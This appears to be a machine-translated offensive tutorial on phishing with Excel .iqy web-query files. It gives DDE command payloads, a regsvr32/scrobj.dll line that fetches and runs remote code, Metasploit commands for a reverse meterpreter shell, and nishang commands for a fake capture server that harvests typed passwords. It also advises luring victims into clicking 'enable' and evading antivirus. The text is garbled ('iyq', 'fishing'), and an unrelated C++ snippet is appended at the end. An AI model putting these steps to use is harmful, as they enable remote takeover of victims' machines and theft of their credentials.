Iyq fishing in Excel


Iyq fishing in Excel

0x00 environment preparation

operating system:windows7

Microsoft office version:office 2010

0x01 understand the basic concept of iyq

You can simply understand iyq as a special “web browser” (unable to load script) built into excel. Through iqy [i.e. Web Query] statement, you can easily introduce all kinds of list data on the web into the current excel. Because of this, it gives us the opportunity to use Excel to make phishing email. If the web data you want to introduce is an intruder’s business First, prepare a piece of payload iqy malicious code, and the result is self-evident.

0x02 initial experience of using Excel iyq

1. Create a new EXCEL file, find “data” – > “from website” – > “address”, fill in the URL of the website to grab data, and select the form to grab data (click the small yellow arrow)



2. Select the corresponding form, and then click Import


Click OK


Effect after successful import


3. Next, use iyq to turn on the computer to see the effect

3.1 place a payload.html file in the website directory of our own server, with the content of iyq code
#Iyq code = cmd| / C calc.exe '! A0


Check out the normal access

3.2 the next step is to pull the payload file on our own server according to the previous method


3.3 import



One more step to confirm


3.4 after all selections are confirmed, the calculator program will pop up after normal execution


0x03 implement meterpreter online with iyq

The additional tools needed for this step are as follows:


1. Prepare the payload of MSF under the Kali attack aircraft

msf > use exploit/multi/script/web_deliverymsf > set target 3msf > set payload windows/meterpreter/reverse_tcp_rc4_dnsmsf > set lhost > set lport 53msf > set rc4password secquan.orgmsf > exploit -j

2. Generate iqy file directly with out webquery script provided in nishing

(the content of iqy file itself i s very simple. There is only one URL containing malicious payload: The key is this HTML. We need to replace the content of HTML with the iqy statement of loading the meterpreter payload we prepared above: Regsvr32 / S / N / U / I: scrobj. DLL). The specific operations are as follows:

2.1 execute the following command under the system Windows 7 used to make phishing files
powershell –exec bypass –Command "& {Import-Module 'C:\tools\nishang\Client\Out-WebQuery.ps1';Out-WebQuery -URL}"

After the command is executed successfully, a new iqy file will be generated




2.2 open our web server, create a meter.html file in the root directory, and write the iqy code of the payload generated by MSF
[email protected]:~# /etc/init.d/apache2 start[ ok ] Starting apache2 (via systemctl): [email protected]:~# cd /var/www/html/[email protected]:/var/www/html# vim [email protected]:/var/www/html# cat meter.html =cmd|'/c regsvr32 /s /n /u /i: scrobj.dll '!A0



3. The next step is to find a way to send the previously generated iqy file to the target user and execute

Once it’s normal, double-click to open it[Excel will be called by default to open]The following security warning box will pop up. As for how to make him click “enable”, you need to think about it carefully


Because the iqy in front of us is executed by CMD, here it will ask if you want to start cmd.exe. As long as the target clicks’ yes’, our meterpreter will go online normally, as follows


4. Go back to the attacker Kali and find that the meterpreter has been successfully launched


0x04 steal target user password with iqy

1. Use out-webquery.ps1 script in nishing tool to generate iqy file, then start web service locally with start-captureserver.ps1

powershell –exec bypass –Command "& {Import-Module 'C:\tools\nishang\Client\Out-WebQuery.ps1'; Out webquery - URL http: // /} "C: \ > PowerShell exec bypass PS C: \ > CD C: \ tools \ nishing \ utilityps C: \ tools \ nishing \ utility > import module. \ start captureserver.ps1ps C: \ tools \ nishing \ utility > start captureserver - authtype basic - IPAddress - logfilepath C: \ windows \ temp \ log.txt Select the basic authentication. The monitored IP is consistent with the IP in the iqy file generated above, which is usually the local I



If PS1 script is forbidden, execute firstset-ExecutionPolicy RemoteSigned


2. Send the generated iqy file to the target user, entice him to click enable and enter the relevant password

Click enable


Entice to enter account password


4. Received the account password from the target user, and obtained it successfully


0x05 some notes on practical use

  • In the actual combat, the out-webquery.ps1 script is used to generate iqy directly, which is not flexible enough. If you can add some normal data in iqy first, it will certainly look more realistic. You have failed to measure it for many times, and will update it after finding a perfect solution later
  • Some AV will detect this kind of attack. Please do a good job in avoiding killing

0x06 source

By klionsec, fishing with iqy features



Recommended Today

Build HTTP service with C + + Mongoose

Mongoose source code address:https://github.com/cesanta/mo… Mongoose user manual:https://www.cesanta.com/devel… Mngoose set up HTTP service #include <string> #include “mongoose.h” using namespace std; static const char *s_http_port = “8000”; static void ev_handler(mg_connection *nc, int ev, void *ev_data) { struct http_message *hm = (struct http_message *) ev_data; if (ev == MG_EV_HTTP_REQUEST) { std::string uri; if (hm->uri.p && hm->uri.p[0] == ‘/’) […]